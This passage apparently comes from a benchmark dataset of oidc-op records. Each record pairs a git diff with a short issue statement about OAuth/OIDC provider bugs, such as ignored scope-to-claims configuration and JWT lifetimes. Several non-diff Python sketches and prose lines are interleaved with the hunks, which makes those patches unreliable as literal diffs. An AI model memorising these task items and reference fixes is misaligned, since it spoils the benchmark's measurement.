+from oidcmsg.configure import create_from_config_file
+
from oidcop.configure import OPConfiguration
-from oidcop.configure import create_from_config_file
from oidcop.utils import create_context
try:
@@ -62,7 +63,7 @@ def main(config_file, args):
app = oidc_provider_init_app(config.op, 'oidc_op')
app.logger = config.logger
- web_conf = config.webserver
+ web_conf = config.web_conf
context = create_context(dir_path, web_conf)
diff --git a/src/oidcop/__init__.py b/src/oidcop/__init__.py
index 490b473d..728a9970 100644
--- a/src/oidcop/__init__.py
+++ b/src/oidcop/__init__.py
@@ -1,6 +1,6 @@
import secrets
-__version__ = "2.3.4"
+__version__ = "2.4.0"
DEF_SIGN_ALG = {
"id_token": "RS256",
diff --git a/src/oidcop/endpoint.py b/src/oidcop/endpoint.py
index 854b85ae..2b98815f 100755
--- a/src/oidcop/endpoint.py
+++ b/src/oidcop/endpoint.py
@@ -1,3 +1,4 @@
+import json
import logging
from typing import Callable
from typing import Optional
@@ -363,7 +364,10 @@ def do_response(
if self.response_placement == "body":
if self.response_format == "json":
content_type = "application/json; charset=utf-8"
- resp = _response.to_json()
+ if isinstance(_response, Message):
+ resp = _response.to_json()
+ else:
+ resp = json.dumps(_response)
elif self.response_format in ["jws", "jwe", "jose"]:
content_type = "application/jose; charset=utf-8"
resp = _response
diff --git a/src/oidcop/endpoint_context.py b/src/oidcop/endpoint_context.py
index 00d9da6c..fd135395 100755
--- a/src/oidcop/endpoint_context.py
+++ b/src/oidcop/endpoint_context.py
@@ -119,13 +119,13 @@ class EndpointContext(OidcContext):
}
def __init__(
- self,
- conf: Union[dict, OPConfiguration],
- server_get: Callable,
- keyjar: Optional[KeyJar] = None,
- cwd: Optional[str] = "",
- cookie_handler: Optional[Any] = None,
- httpc: Optional[Any] = None,
+ self,
+ conf: Union[dict, OPConfiguration],
+ server_get: Callable,
+ keyjar: Optional[KeyJar] = None,
+ cwd: Optional[str] = "",
+ cookie_handler: Optional[Any] = None,
+ httpc: Optional[Any] = None,
):
OidcContext.__init__(self, conf, keyjar, entity_id=conf.get("issuer", ""))
self.conf = conf
@@ -148,6 +148,7 @@ def __init__(
# Default values, to be changed below depending on configuration
# arguments for endpoints add-ons
+ self.add_on = {}
self.args = {}
self.authn_broker = None
self.authz = None
@@ -161,7 +162,7 @@ def __init__(
self.login_hint2acrs = None
self.par_db = {}
self.provider_info = {}
- self.scope2claims = SCOPE2CLAIMS
+ self.scope2claims = conf.get("scopes_to_claims", SCOPE2CLAIMS)
self.session_manager = None
self.sso_ttl = 14400 # 4h
self.symkey = rndstr(24)
@@ -215,7 +216,6 @@ def __init__(
"cookie_handler",
"authentication",
"id_token",
- "scope2claims",
]:
_func = getattr(self, "do_{}".format(item), None)
if _func:
diff --git a/src/oidcop/oauth2/add_on/extra_args.py b/src/oidcop/oauth2/add_on/extra_args.py
new file mode 100644
index 00000000..68a8a84a
--- /dev/null
+++ b/src/oidcop/oauth2/add_on/extra_args.py
@@ -0,0 +1,31 @@
+def pre_construct(response_args, request, endpoint_context, **kwargs):
+ """
+ Add extra arguments to the request.
+
+ :param response_args:
+ :param request:
+ :param endpoint_context:
+ :param kwargs:
+ :return:
+ """
+
+ _extra = endpoint_context.add_on.get("extra_args")
+ if _extra:
+ for arg, _param in _extra.items():
+ _val = endpoint_context.get(_param)
+ if _val:
+ request[arg] = _val
+
+ return request
+
+
+def add_support(endpoint, **kwargs):
+ #
+ _added = False
+ for endpoint_name in list(kwargs.keys()):
+ _endp = endpoint[endpoint_name]
+ _endp.pre_construct.append(pre_construct)
+
+ if _added is False:
+ _endp.server_get("endpoint_context").add_on["extra_args"] = kwargs
+ _added = True
diff --git a/src/oidcop/session/claims.py b/src/oidcop/session/claims.py
index 7ca31cc7..bcea0580 100755
--- a/src/oidcop/session/claims.py
+++ b/src/oidcop/session/claims.py
@@ -117,7 +117,10 @@ def get_claims_from_request(
_always_add = module.kwargs.get("always_add_claims", {})
if _always_add:
- base_claims.update({k: None for k in _always_add})
+ if isinstance(_always_add, list):
+ base_claims.update({k: None for k in _always_add})
+ else:
+ base_claims.update(_always_add)
if _claims_by_scope:
if scopes is None:
diff --git a/src/oidcop/session/grant.py b/src/oidcop/session/grant.py
index 16b4eb0a..a7c6f8d0 100644
--- a/src/oidcop/session/grant.py
+++ b/src/oidcop/session/grant.py
@@ -227,7 +227,7 @@ def payload_arguments(
if self.authorization_request:
client_id = self.authorization_request.get("client_id")
if client_id:
- payload.update({"client_id": client_id, "sub": client_id})
+ payload.update({"client_id": client_id, "sub": self.sub})
_claims_restriction = endpoint_context.claims_interface.get_claims(
session_id,
| The configuration parameter `scopes_to_claims` was not handled correctly.
The parameter was basically ignored.
| 2022-02-01T10:48:27 | 0.0 | [] | [] |
|||
IdentityPython/oidc-op | IdentityPython__oidc-op-122 | 41d7f5e86ad086b6b3c266d1b92d54cbfe2b8733 | diff --git a/.github/workflows/pypi.yml b/.github/workflows/pypi.yml
new file mode 100644
index 00000000..4a916526
--- /dev/null
+++ b/.github/workflows/pypi.yml
@@ -0,0 +1,35 @@
+name: Publish Python distribution to PyPI
+on:
+ release:
+ types:
+ - created
+
+jobs:
+ build-n-publish:
+ name: Publish Python distribution to PyPI
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@master
+ - name: Setup Python 3.8
+ uses: actions/setup-python@v1
+ with:
+ python-version: 3.8
+ - name: Install pypa/build
+ run: >-
+ python -m
+ pip install
+ build
+ --user
+ - name: Build a binary wheel and a source tarball
+ run: >-
+ python -m
+ build
+ --sdist
+ --wheel
+ --outdir dist/
+ .
+ - name: Publish distribution to PyPI
+ uses: pypa/gh-action-pypi-publish@master
+ with:
+ user: __token__
+ password: ${{ secrets.PYPI_API_TOKEN }}
diff --git a/docs/source/contents/conf.rst b/docs/source/contents/conf.rst
index 34493edc..483a7d4c 100644
--- a/docs/source/contents/conf.rst
+++ b/docs/source/contents/conf.rst
@@ -84,6 +84,27 @@ An example::
}
}
+The provided add-ons can be seen in the following sections.
+
+pkce
+####
+
+The pkce add on is activated using the ``oidcop.oidc.add_on.pkce.add_pkce_support``
+function. The possible configuration options can be found below.
+
+essential
+---------
+
+Whether pkce is mandatory, authentication requests without a ``code_challenge``
+will fail if this is True. This option can be overridden per client by defining
+``pkce_essential`` in the client metadata.
+
+code_challenge_method
+---------------------
+
+The allowed code_challenge methods. The supported code challenge methods are:
+``plain, S256, S384, S512``
+
--------------
authentication
--------------
@@ -622,3 +643,72 @@ the following::
}
}
}
+
+
+=======
+Clients
+=======
+
+In this section there are some client configuration examples.
+
+A common configuration::
+
+ endpoint_context.cdb['jbxedfmfyc'] = {
+ client_id: 'jbxedfmfyc',
+ client_salt: '6flfsj0Z',
+ registration_access_token: 'z3PCMmC1HZ1QmXeXGOQMJpWQNQynM4xY',
+ registration_client_uri: 'https://127.0.0.1:8000/registration_api?client_id=jbxedfmfyc',
+ client_id_issued_at: 1630256902,
+ client_secret: '19cc69b70d0108f630e52f72f7a3bd37ba4e11678ad1a7434e9818e1',
+ client_secret_expires_at: 1929727754,
+ application_type: 'web',
+ contacts: [
+ '[email protected]'
+ ],
+ token_endpoint_auth_method: 'client_secret_basic',
+ redirect_uris: [
+ [
+ 'https://127.0.0.1:8090/authz_cb/satosa',
+ {}
+ ]
+ ],
+ post_logout_redirect_uris: [
+ [
+ 'https://127.0.0.1:8090/session_logout/satosa',
+ null
+ ]
+ ],
+ response_types: [
+ 'code'
+ ],
+ grant_types: [
+ 'authorization_code'
+ ],
+ allowed_scopes: [
+ 'openid',
+ 'profile',
+ 'email',
+ 'offline_access'
+ ]
+ }
+
+
+How to configure the release of user claims per client::
+
+ endpoint_context.cdb["client_1"] = {
+ "client_secret": "hemligt",
+ "redirect_uris": [("https://example.com/cb", None)],
+ "client_salt": "salted",
+ "token_endpoint_auth_method": "client_secret_post",
+ "response_types": ["code", "token", "code id_token", "id_token"],
+ "add_claims": {
+ "always": {
+ "introspection": ["nickname", "eduperson_scoped_affiliation"],
+ "userinfo": ["picture", "phone_number"],
+ },
+ # this overload the general endpoint configuration for this client
+ # self.server.server_get("endpoint", "id_token").kwargs = {"add_claims_by_scope": True}
+ "by_scope": {
+ "id_token": False,
+ },
+        },
+    }
diff --git a/docs/source/contents/usage.md b/docs/source/contents/usage.md
index 5fb8ab70..795cc0d3 100644
--- a/docs/source/contents/usage.md
+++ b/docs/source/contents/usage.md
@@ -1,7 +1,7 @@
Usage
-----
-Some examples, how to run flask_op and django_op, but also some typical configuration in relation to common use cases.
+Some examples of how to run [flask_op](https://github.com/IdentityPython/oidc-op/tree/master/example/flask_op) and [django_op](https://github.com/peppelinux/django-oidc-op), as well as some typical configurations for common use cases.
@@ -34,7 +34,7 @@ Get to the RP landing page to choose your authentication endpoint. The first opt

-AS/OP accepted our authentication request and prompt to us the login form. Read passwd.json file to get credentials.
+The AS/OP supports dynamic client registration; it accepts the authentication request and presents the login form. Read the [passwd.json](https://github.com/IdentityPython/oidc-op/blob/master/example/flask_op/passwd.json) file to get the credentials.
----------------------------------
@@ -75,12 +75,12 @@ It is important to consider that only scope=offline_access will get a usable ref
oidc-op will return a json response like this::
-{
- 'access_token': 'eyJhbGc ... CIOH_09tT_YVa_gyTqg',
- 'token_type': 'Bearer',
- 'scope': 'openid profile email address phone offline_access',
- 'refresh_token': 'Z0FBQ ... 1TE16cm1Tdg=='
-}
+ {
+ 'access_token': 'eyJhbGc ... CIOH_09tT_YVa_gyTqg',
+ 'token_type': 'Bearer',
+ 'scope': 'openid profile email address phone offline_access',
+ 'refresh_token': 'Z0FBQ ... 1TE16cm1Tdg=='
+ }
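The refresh token handling above is validated elsewhere in this patch by checking that the requested scopes are a subset of the scopes originally granted. A minimal sketch of that check (illustrative names; the real validation lives in the token endpoint's `post_parse_request`):

```python
# Sketch: a refresh request may only narrow scopes, never widen them.
# `granted` mirrors grant.find_scope(...); `requested` is the scope
# parameter of the refresh request.

def refresh_scopes_valid(requested: list, granted: list) -> bool:
    """Requested refresh scopes must be a subset of the originally granted ones."""
    return set(requested).issubset(set(granted))


if __name__ == "__main__":
    granted = ["openid", "profile", "email", "offline_access"]
    print(refresh_scopes_valid(["openid", "email"], granted))  # narrowing is fine
    print(refresh_scopes_valid(["openid", "admin"], granted))  # widening is rejected
```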
diff --git a/example/flask_op/views.py b/example/flask_op/views.py
index f8e485b6..a10d41fc 100644
--- a/example/flask_op/views.py
+++ b/example/flask_op/views.py
@@ -32,6 +32,7 @@ def _add_cookie(resp, cookie_spec):
for k,v in cookie_spec.items()
if k not in ('name',)}
kwargs["path"] = "/"
+ kwargs["samesite"] = "Lax"
resp.set_cookie(cookie_spec["name"], **kwargs)
diff --git a/requirements.txt b/requirements.txt
index 9126daf7..d7aa79dd 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,4 +1,4 @@
-oidcmsg>=1.3.0
+oidcmsg>=1.4.0
pyyaml
jinja2>=2.11.3
responses>=0.13.0
diff --git a/src/oidcop/__init__.py b/src/oidcop/__init__.py
index 9b05f0cf..353bd1f8 100644
--- a/src/oidcop/__init__.py
+++ b/src/oidcop/__init__.py
@@ -1,6 +1,6 @@
import secrets
-__version__ = "2.1.0"
+__version__ = "2.1.1"
DEF_SIGN_ALG = {
"id_token": "RS256",
diff --git a/src/oidcop/client_authn.py b/src/oidcop/client_authn.py
index f02868d9..7678419a 100755
--- a/src/oidcop/client_authn.py
+++ b/src/oidcop/client_authn.py
@@ -22,6 +22,7 @@
from oidcop.exception import InvalidClient
from oidcop.exception import MultipleUsage
from oidcop.exception import NotForMe
+from oidcop.exception import ToOld
from oidcop.exception import UnknownClient
from oidcop.util import importer
@@ -409,6 +410,8 @@ def verify_client(
try:
# get_client_id_from_token is a callback... Do not abuse for code readability.
auth_info["client_id"] = get_client_id_from_token(endpoint_context, _token, request)
+ except ToOld:
+ raise ValueError("Expired token")
except KeyError:
raise ValueError("Unknown token")
diff --git a/src/oidcop/oauth2/token.py b/src/oidcop/oauth2/token.py
index 87724793..e84ea887 100755
--- a/src/oidcop/oauth2/token.py
+++ b/src/oidcop/oauth2/token.py
@@ -253,7 +253,7 @@ def process_request(self, req: Union[Message, dict], **kwargs):
_resp = {
"access_token": access_token.value,
"token_type": access_token.token_type,
- "scope": _grant.scope,
+ "scope": scope,
}
if access_token.expires_at:
@@ -318,7 +318,7 @@ def post_parse_request(
if "scope" in request:
req_scopes = set(request["scope"])
scopes = set(grant.find_scope(token.based_on))
- if scopes < req_scopes:
+ if not req_scopes.issubset(scopes):
return self.error_cls(
error="invalid_request",
error_description="Invalid refresh scopes",
diff --git a/src/oidcop/oidc/add_on/pkce.py b/src/oidcop/oidc/add_on/pkce.py
index 75b541d6..6825c38c 100644
--- a/src/oidcop/oidc/add_on/pkce.py
+++ b/src/oidcop/oidc/add_on/pkce.py
@@ -3,11 +3,9 @@
from typing import Dict
from cryptojwt.utils import b64e
-from oidcmsg.oauth2 import (
- AuthorizationErrorResponse,
- RefreshAccessTokenRequest,
- TokenExchangeRequest,
-)
+from oidcmsg.oauth2 import AuthorizationErrorResponse
+from oidcmsg.oauth2 import RefreshAccessTokenRequest
+from oidcmsg.oauth2 import TokenExchangeRequest
from oidcmsg.oidc import TokenErrorResponse
from oidcop.endpoint import Endpoint
@@ -41,7 +39,14 @@ def post_authn_parse(request, client_id, endpoint_context, **kwargs):
:param kwargs:
:return:
"""
- if endpoint_context.args["pkce"]["essential"] and "code_challenge" not in request:
+ client = endpoint_context.cdb[client_id]
+ if "pkce_essential" in client:
+ essential = client["pkce_essential"]
+ else:
+ essential = endpoint_context.args["pkce"].get(
+ "essential", False
+ )
+ if essential and "code_challenge" not in request:
return AuthorizationErrorResponse(
error="invalid_request", error_description="Missing required code_challenge",
)
@@ -131,9 +136,6 @@ def add_pkce_support(endpoint: Dict[str, Endpoint], **kwargs):
authn_endpoint.post_parse_request.append(post_authn_parse)
token_endpoint.post_parse_request.append(post_token_parse)
- if "essential" not in kwargs:
- kwargs["essential"] = False
-
code_challenge_methods = kwargs.get("code_challenge_methods", CC_METHOD.keys())
kwargs["code_challenge_methods"] = {}
diff --git a/src/oidcop/oidc/token.py b/src/oidcop/oidc/token.py
index 0a4aeca9..a88f45c8 100755
--- a/src/oidcop/oidc/token.py
+++ b/src/oidcop/oidc/token.py
@@ -218,7 +218,7 @@ def process_request(self, req: Union[Message, dict], **kwargs):
_resp = {
"access_token": access_token.value,
"token_type": token_type,
- "scope": _grant.scope,
+ "scope": scope,
}
if access_token.expires_at:
@@ -246,7 +246,7 @@ def process_request(self, req: Union[Message, dict], **kwargs):
if "id_token" in _mints and "openid" in scope:
try:
_idtoken = self._mint_token(
- token_class="refresh_token",
+ token_class="id_token",
grant=_grant,
session_id=_session_info["session_id"],
client_id=_session_info["client_id"],
@@ -307,7 +307,7 @@ def post_parse_request(
if "scope" in request:
req_scopes = set(request["scope"])
scopes = set(grant.find_scope(token.based_on))
- if scopes < req_scopes:
+ if not req_scopes.issubset(scopes):
return self.error_cls(
error="invalid_request",
error_description="Invalid refresh scopes",
diff --git a/src/oidcop/session/claims.py b/src/oidcop/session/claims.py
index edcb1076..5ac1991c 100755
--- a/src/oidcop/session/claims.py
+++ b/src/oidcop/session/claims.py
@@ -5,6 +5,7 @@
from oidcmsg.oidc import OpenIDSchema
from oidcop.exception import ServiceError
+from oidcop.exception import ImproperlyConfigured
from oidcop.scopes import convert_scopes2claims
logger = logging.getLogger(__name__)
@@ -41,7 +42,11 @@ def authorization_request_claims(self,
def _get_client_claims(self, client_id, usage):
client_info = self.server_get("endpoint_context").cdb.get(client_id, {})
- client_claims = client_info.get("{}_claims".format(usage), {})
+ client_claims = (
+ client_info.get("add_claims", {})
+ .get("always", {})
+ .get(usage, {})
+ )
if isinstance(client_claims, list):
client_claims = {k: None for k in client_claims}
return client_claims
@@ -94,8 +99,19 @@ def get_claims(self, session_id: str, scopes: str, claims_release_point: str) ->
claims.update(base_claims)
- # Scopes can in some cases equate to set of claims, is that used here ?
- if module.kwargs.get("add_claims_by_scope"):
+ # If specific client configuration exists overwrite add_claims_by_scope
+ if client_id in _context.cdb:
+ add_claims_by_scope = (
+ _context.cdb[client_id].get("add_claims", {})
+ .get("by_scope", {})
+ .get(claims_release_point, {})
+ )
+ if isinstance(add_claims_by_scope, dict) and not add_claims_by_scope:
+ add_claims_by_scope = module.kwargs.get("add_claims_by_scope")
+ else:
+ add_claims_by_scope = module.kwargs.get("add_claims_by_scope")
+
+ if add_claims_by_scope:
if scopes:
_scopes = _context.scopes_handler.filter_scopes(client_id, _context, scopes)
@@ -127,9 +143,14 @@ def get_user_claims(self, user_id: str, claims_restriction: dict) -> dict:
:param claims_restriction: Specifies the upper limit of which claims can be returned
:return:
"""
+ meth = self.server_get("endpoint_context").userinfo
+ if not meth:
+ raise ImproperlyConfigured(
+ "userinfo MUST be defined in the configuration"
+ )
if claims_restriction:
# Get all possible claims
- user_info = self.server_get("endpoint_context").userinfo(user_id, client_id=None)
+ user_info = meth(user_id, client_id=None)
# Filter out the claims that can be returned
return {
k: user_info.get(k)
diff --git a/src/oidcop/session/grant.py b/src/oidcop/session/grant.py
index 29a83dd7..25b66692 100644
--- a/src/oidcop/session/grant.py
+++ b/src/oidcop/session/grant.py
@@ -316,7 +316,9 @@ def mint_token(
scope=scope,
extra_payload=handler_args,
)
- item.value = token_handler(session_id=session_id, **token_payload)
+ item.value = token_handler(
+ session_id=session_id, usage_rules=usage_rules, **token_payload
+ )
else:
raise ValueError("Can not mint that kind of token")
diff --git a/src/oidcop/session/manager.py b/src/oidcop/session/manager.py
index b8129904..12875293 100644
--- a/src/oidcop/session/manager.py
+++ b/src/oidcop/session/manager.py
@@ -12,6 +12,7 @@
from oidcop.exception import ConfigurationError
from oidcop.token import handler
from oidcop.util import Crypt
+from oidcop.session.database import NoSuchClientSession
from .database import Database
from .grant import Grant
from .grant import SessionToken
@@ -226,9 +227,11 @@ def create_session(
if not client_id:
client_id = auth_req["client_id"]
- client_info = ClientSessionInfo(client_id=client_id)
-
- self.set([user_id, client_id], client_info)
+ try:
+ self.get([user_id, client_id])
+ except (NoSuchClientSession, ValueError):
+ client_info = ClientSessionInfo(client_id=client_id)
+ self.set([user_id, client_id], client_info)
return self.create_grant(
auth_req=auth_req,
diff --git a/src/oidcop/token/id_token.py b/src/oidcop/token/id_token.py
index 6d08ed0d..5f8bc1f4 100755
--- a/src/oidcop/token/id_token.py
+++ b/src/oidcop/token/id_token.py
@@ -12,9 +12,10 @@
from oidcop.session.claims import claims_match
from oidcop.token import is_expired
from oidcop.token.exception import InvalidToken
+
+from ..util import get_logout_id
from . import Token
from . import UnknownToken
-from ..util import get_logout_id
logger = logging.getLogger(__name__)
@@ -131,9 +132,16 @@ def __init__(
self.provider_info = construct_endpoint_info(self.default_capabilities, **kwargs)
def payload(
- self, session_id, alg="RS256", code=None, access_token=None, extra_claims=None,
+ self,
+ session_id,
+ alg="RS256",
+ code=None,
+ access_token=None,
+ extra_claims=None,
+ user_info=None,
):
"""
+ Collect payload for the ID Token.
:param session_id: Session identifier
:param alg: Which signing algorithm to use for the IdToken
@@ -154,16 +162,18 @@ def payload(
if _val:
_args[attr] = _val
- _claims_restriction = grant.claims.get("id_token")
- if _claims_restriction == {}:
- user_info = None
- else:
- user_info = _context.claims_interface.get_user_claims(
- user_id=session_information["user_id"], claims_restriction=_claims_restriction,
- )
- if _claims_restriction and "acr" in _claims_restriction and "acr" in _args:
- if claims_match(_args["acr"], _claims_restriction["acr"]) is False:
- raise ValueError("Could not match expected 'acr'")
+ if not user_info:
+ _claims_restriction = grant.claims.get("id_token")
+ if _claims_restriction == {}:
+ user_info = None
+ else:
+ user_info = _context.claims_interface.get_user_claims(
+ user_id=session_information["user_id"],
+ claims_restriction=_claims_restriction,
+ )
+ if _claims_restriction and "acr" in _claims_restriction and "acr" in _args:
+ if claims_match(_args["acr"], _claims_restriction["acr"]) is False:
+ raise ValueError("Could not match expected 'acr'")
if user_info:
try:
@@ -197,18 +207,21 @@ def payload(
except KeyError:
pass
+ logger.debug(f"Constructed ID Token payload: {_args}")
+
return _args
def sign_encrypt(
- self,
- session_id,
- client_id,
- code=None,
- access_token=None,
- sign=True,
- encrypt=False,
- lifetime=None,
- extra_claims=None,
+ self,
+ session_id,
+ client_id,
+ code=None,
+ access_token=None,
+ sign=True,
+ encrypt=False,
+ lifetime=None,
+ extra_claims=None,
+ user_info=None,
) -> str:
"""
Signed and or encrypt a IDToken
@@ -237,6 +250,7 @@ def sign_encrypt(
code=code,
access_token=access_token,
extra_claims=extra_claims,
+ user_info=user_info,
)
if lifetime is None:
@@ -246,7 +260,16 @@ def sign_encrypt(
return _jwt.pack(_payload, recv=client_id)
- def __call__(self, session_id: Optional[str] = "", ttype: Optional[str] = "", **kwargs) -> str:
+ def __call__(
+ self,
+ session_id: Optional[str] = "",
+ ttype: Optional[str] = "",
+ encrypt=False,
+ code=None,
+ access_token=None,
+ usage_rules: Optional[dict] = None,
+ **kwargs,
+ ) -> str:
_context = self.server_get("endpoint_context")
user_id, client_id, grant_id = _context.session_manager.decrypt_session_id(session_id)
@@ -262,11 +285,16 @@ def __call__(self, session_id: Optional[str] = "", ttype: Optional[str] = "", **
lifetime = self.lifetime
- # Weed out stuff that doesn't belong here
- kwargs = {k: v for k, v in kwargs.items() if k in ["encrypt", "code", "access_token"]}
-
id_token = self.sign_encrypt(
- session_id, client_id, sign=True, lifetime=lifetime, extra_claims=xargs, **kwargs
+ session_id,
+ client_id,
+ sign=True,
+ lifetime=lifetime,
+ extra_claims=xargs,
+ encrypt=encrypt,
+ code=code,
+ access_token=access_token,
+ user_info=kwargs,
)
return id_token
@@ -297,6 +325,8 @@ def info(self, token):
except JWSException:
raise UnknownToken()
+ logger.debug(f"Received ID Token payload: {_payload}")
+
if is_expired(_payload["exp"]):
raise ToOld("Token has expired")
# All the token metadata
diff --git a/src/oidcop/token/jwt_token.py b/src/oidcop/token/jwt_token.py
index 1329f64d..d19024c9 100644
--- a/src/oidcop/token/jwt_token.py
+++ b/src/oidcop/token/jwt_token.py
@@ -48,8 +48,13 @@ def load_custom_claims(self, payload: dict = None):
# inherit me and do your things here
return payload
- def __call__(self, session_id: Optional[str] = "", token_class: Optional[str] = "",
- **payload) -> str:
+ def __call__(
+ self,
+ session_id: Optional[str] = "",
+ token_class: Optional[str] = "",
+ usage_rules: Optional[dict] = None,
+ **payload
+ ) -> str:
"""
Return a token.
@@ -70,8 +75,15 @@ def __call__(self, session_id: Optional[str] = "", token_class: Optional[str] =
# payload.update(kwargs)
_context = self.server_get("endpoint_context")
+ if usage_rules and "expires_in" in usage_rules:
+ lifetime = usage_rules.get("expires_in")
+ else:
+ lifetime = self.lifetime
signer = JWT(
- key_jar=_context.keyjar, iss=self.issuer, lifetime=self.lifetime, sign_alg=self.alg,
+ key_jar=_context.keyjar,
+ iss=self.issuer,
+ lifetime=lifetime,
+ sign_alg=self.alg,
)
return signer.pack(payload)
| Fix JWT access token lifetime
The `expires_in` defined in usage rules was not reflected in the access token when it was a JWT
| 2021-09-03T00:02:29 | 0.0 | [] | [] |
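The lifetime fix in this patch can be illustrated with a small sketch (the names and the default value below are illustrative): when the grant's usage rules carry an `expires_in`, that value is used as the JWT lifetime; otherwise the handler's configured default applies.

```python
# Sketch: pick the JWT lifetime from the grant's usage rules when present,
# falling back to the handler's default. DEFAULT_LIFETIME is illustrative.
from typing import Optional

DEFAULT_LIFETIME = 300  # seconds; stands in for the handler's self.lifetime


def effective_lifetime(usage_rules: Optional[dict],
                       default: int = DEFAULT_LIFETIME) -> int:
    """usage_rules["expires_in"] wins over the default lifetime."""
    if usage_rules and "expires_in" in usage_rules:
        return usage_rules["expires_in"]
    return default


if __name__ == "__main__":
    print(effective_lifetime({"expires_in": 600}))  # taken from the usage rules
    print(effective_lifetime(None))                 # handler default
```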
|||
IdentityPython/oidc-op | IdentityPython__oidc-op-109 | b3605a0288db249059cb80c4c3eb4a7e4ae45176 | diff --git a/docs/source/contents/conf.rst b/docs/source/contents/conf.rst
index ea23e089..34493edc 100644
--- a/docs/source/contents/conf.rst
+++ b/docs/source/contents/conf.rst
@@ -156,9 +156,35 @@ An example::
backchannel_logout_session_supported: True
check_session_iframe: https://127.0.0.1:5000/check_session_iframe
--------------
+---------
+client_db
+---------
+
+If you are running an OP with static client registration, you will want to keep
+the registered clients in a database separate from the session database, since
+it changes independently of the OP process. In that case you need this option.
+If, on the other hand, you only allow dynamic client registration, then keeping
+the registered clients in the session database makes perfect sense.
+
+The class you reference in the specification MUST be a subclass of
+oidcmsg.storage.DictType and have some of the methods a dictionary has.
+
+Note also that this class MUST support the dump and load methods as defined
+in :py:class:`oidcmsg.impexp.ImpExp`.
+
+An example::
+
+ client_db: {
+ "class": 'oidcmsg.abfile.AbstractFileSystem',
+ "kwargs": {
+ 'fdir': full_path("afs"),
+ 'value_conv': 'oidcmsg.util.JSON'
+ }
+ }
+
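A minimal in-memory stand-in for such a client database might look like the sketch below. This is an illustrative assumption about the interface implied by the description above (dictionary-style access plus `dump`/`load`), not the actual `oidcmsg.storage.DictType` implementation.

```python
# Sketch: a dict-backed client store exposing dictionary-style methods
# plus dump()/load() in the spirit of oidcmsg.impexp.ImpExp. Illustrative only.

class InMemoryClientDB:
    def __init__(self, **kwargs):
        self._db = {}

    def __getitem__(self, client_id):
        return self._db[client_id]

    def __setitem__(self, client_id, metadata):
        self._db[client_id] = metadata

    def __contains__(self, client_id):
        return client_id in self._db

    def get(self, client_id, default=None):
        return self._db.get(client_id, default)

    def keys(self):
        return self._db.keys()

    def dump(self):
        # Export the whole store as a plain dict.
        return dict(self._db)

    def load(self, info):
        # Restore the store from a previously dumped dict.
        self._db = dict(info)
        return self


if __name__ == "__main__":
    cdb = InMemoryClientDB()
    cdb["client_1"] = {"client_secret": "hemligt"}
    print("client_1" in cdb)
    print(cdb.dump())
```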
+--------------
cookie_handler
--------------
+--------------
An example::
diff --git a/pyproject.toml b/pyproject.toml
index cff54529..7564b0ee 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -7,7 +7,7 @@ build-backend = "setuptools.build_meta"
[metadata]
name = "oidcop"
-version = "2.0.0"
+version = "2.1.0"
author = "Roland Hedberg"
author_email = "[email protected]"
description = "Python implementation of an OAuth2 AS and an OIDC Provider"
diff --git a/setup.py b/setup.py
index 4ac7ce57..d707fd8a 100644
--- a/setup.py
+++ b/setup.py
@@ -72,7 +72,7 @@ def run_tests(self):
"Programming Language :: Python :: 3.9",
"Topic :: Software Development :: Libraries :: Python Modules"],
install_requires=[
- "oidcmsg==1.3.3-1",
+ "oidcmsg==1.4.0",
"cryptojwt==1.5.2",
"pyyaml",
"jinja2>=2.11.3",
diff --git a/src/oidcop/__init__.py b/src/oidcop/__init__.py
index 83246c0e..9b05f0cf 100644
--- a/src/oidcop/__init__.py
+++ b/src/oidcop/__init__.py
@@ -1,6 +1,6 @@
import secrets
-__version__ = "2.0.1"
+__version__ = "2.1.0"
DEF_SIGN_ALG = {
"id_token": "RS256",
diff --git a/src/oidcop/configure.py b/src/oidcop/configure.py
index edd270c9..042593fa 100755
--- a/src/oidcop/configure.py
+++ b/src/oidcop/configure.py
@@ -192,6 +192,7 @@ class EntityConfiguration(Base):
"base_url": "",
"capabilities": None,
"claims_interface": None,
+ "client_db": None,
"cookie_handler": None,
"endpoint": {},
"httpc_params": {},
diff --git a/src/oidcop/endpoint_context.py b/src/oidcop/endpoint_context.py
index e3c19dbe..9a683f2b 100755
--- a/src/oidcop/endpoint_context.py
+++ b/src/oidcop/endpoint_context.py
@@ -93,7 +93,7 @@ class EndpointContext(OidcContext):
"args": {},
# "authn_broker": AuthnBroker,
# "authz": AuthzHandling,
- "cdb": {},
+ "cdb": "DICT_TYPE",
"conf": {},
# "cookie_handler": None,
"cwd": "",
@@ -129,8 +129,15 @@ def __init__(
OidcContext.__init__(self, conf, keyjar, entity_id=conf.get("issuer", ""))
self.conf = conf
+ _client_db = conf.get("client_db")
+ if _client_db:
+ logger.debug(f"Loading client db using: {_client_db}")
+ self.cdb = importer(_client_db["class"])(**_client_db["kwargs"])
+ else:
+ logger.debug("No special client db, will use memory based dictionary")
+ self.cdb = {}
+
# For my Dev environment
- self.cdb = {}
self.jti_db = {}
self.registration_access_token = {}
# self.session_db = {}
diff --git a/src/oidcop/oidc/userinfo.py b/src/oidcop/oidc/userinfo.py
index 37f40078..1b514c01 100755
--- a/src/oidcop/oidc/userinfo.py
+++ b/src/oidcop/oidc/userinfo.py
@@ -10,6 +10,7 @@
from oidcmsg import oidc
from oidcmsg.message import Message
from oidcmsg.oauth2 import ResponseMessage
+from oidcop.session.claims import claims_match
from oidcop.endpoint import Endpoint
from oidcop.token.exception import UnknownToken
@@ -140,6 +141,8 @@ def process_request(self, request=None, **kwargs):
user_id=_session_info["user_id"], claims_restriction=_claims
)
info["sub"] = _grant.sub
+ if _grant.add_acr_value("userinfo"):
+ info["acr"] = _grant.authentication_event["authn_info"]
else:
info = {
"error": "invalid_request",
diff --git a/src/oidcop/session/grant.py b/src/oidcop/session/grant.py
index b9adb41e..29a83dd7 100644
--- a/src/oidcop/session/grant.py
+++ b/src/oidcop/session/grant.py
@@ -9,6 +9,7 @@
from oidcop.authn_event import AuthnEvent
from oidcop.session import MintingNotAllowed
+from oidcop.session.claims import claims_match
from oidcop.session.token import AccessToken
from oidcop.session.token import AuthorizationCode
from oidcop.session.token import IDToken
@@ -180,6 +181,14 @@ def find_scope(self, based_on):
return self.scope
+ def add_acr_value(self, claims_release_point):
+ _release = self.claims.get(claims_release_point)
+ if _release:
+ _acr_request = _release.get("acr")
+ _used_acr = self.authentication_event.get("authn_info")
+ return claims_match(_used_acr, _acr_request)
+ return False
+
def payload_arguments(
self,
